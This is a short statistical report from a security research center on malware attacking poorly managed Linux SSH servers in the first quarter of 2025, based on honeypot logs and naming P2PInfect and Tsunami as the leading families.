Statistical Report on Malware Targeting Linux SSH Servers in Q1 2025
Overview
AhnLab SEcurity intelligence Center (ASEC) conducts response and classification of brute force or dictionary attacks targeting poorly managed Linux SSH servers using honeypots. This report will cover the status of attack sources identified in the first quarter of 2025 based on logs, as well as statistics on attacks performed by these attack sources. Furthermore, malware used in each attack will be categorized with a summary of the statistical details.
Statistics
1. Status of Attacks on Linux SSH Servers
The following statistics are based on the AhnLab honeypot logs for attacks targeting Linux SSH servers during the first quarter of 2025. Attacks by the worm malware P2PInfect ranked top with 56.3%, follwed by Tsunami with 25.4%. Both malware accounts for 80% of all malware statistics.
Figure 1. Status of attacks on Linux SSH servers in the Q1 2025
The “Attack source” category refers to the quantity of systems used in attacks by malware or threat actors. In other words, systems where a history of actual malware installation commands being executed has been confirmed. ASEC honeypots collect logs related to attacks targeting poorly managed Linux SSH servers. In this instance, they are defined as environments vulnerable to brute force or dictionary attacks due to poorly configured account credentials. If successful login occurs on inadequately managed systems, the malware or threat actor can gain control over those systems.
The “Attack status” shows the number of times threat actors or malware attacked the system. Attacks on poorly managed Linux SSH servers begin with scanning. After scanning, most attack attempts either end after obtaining account credentials through brute force or dictionary attacks, or after the subsequent phase of collecting basic information. In this report, we will summarize the statistical information based on cases that go beyond this stage and have confirmed logs of malware being installed.
